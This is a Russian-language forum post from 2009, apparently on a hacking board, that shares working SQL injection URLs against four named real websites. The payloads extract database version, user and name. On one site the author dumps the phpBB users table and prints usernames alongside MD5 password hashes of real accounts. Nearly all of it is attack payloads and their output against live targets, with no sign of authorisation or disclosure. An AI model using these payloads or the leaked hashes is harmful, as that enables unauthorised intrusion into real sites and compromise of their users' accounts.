Показать сообщение отдельно

  #9768  
Старый 09.06.2009, 10:47
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://ihtc.ru/device.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,concat_ws(0x3a,version(),user(), database())
4.1.22:digs_mysql@194.85.95.84:digs_ihtc

на сайте есть форум, phpbb, попробуем обратиться к phpbb_users

http://ihtc.ru/device.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38+from+phpbb_users
"38" выводится, пробуем вырвать юзеров и пароли

http://ihtc.ru/device.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,concat_ws(0x3a,user_id,username, user_password)+from+phpbb_users+limit+1,1

меняем limit...


Код:
-1::Anonymous
2:912cf5e2e231609b0d0fce0f677dc579:newspalm
3:25849d65beb0a2793b2c2d0dd72b84cc:Megabass
4:470671a0ab36f8e7c496312fc794122e:/DiOs
5:421b47ffd946ca083b65cd668c6b17e6:quinine
6:a2c97337264f510aaba2f42f0a58a66f:InReklama
7:8d0c6f638e1326e65c53beba2a41b1eb:Gover
8:7d82c72e13cb1fe7b29b1cba10d468c3:Denis
и т.д.

------------------

http://www.blesna-n.ru/fotoalbum.php?rez=-2+union+select+11111,22222,concat_ws(0x3a,version( ),user(),database())
отображается в ссылке (<A HREF=../pic/big_regats/4.1.22:blesnan@tix.hc.ru:wwwblesnanru target="1" или просто посмотреть в статусе при наведении на месте где должна была быть фотка )

----------------

http://www.clever.saratov.ru/site/photo/index.php?id_parent=2+and+substring(version(),1,1) =5

-----------------

http://www.3eye.ru/screen-info.php?screen=-7+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9
4.0.17:3eye@localhost:3eye

Последний раз редактировалось AlexSatter; 09.06.2009 в 13:07..
 
Ответить с цитированием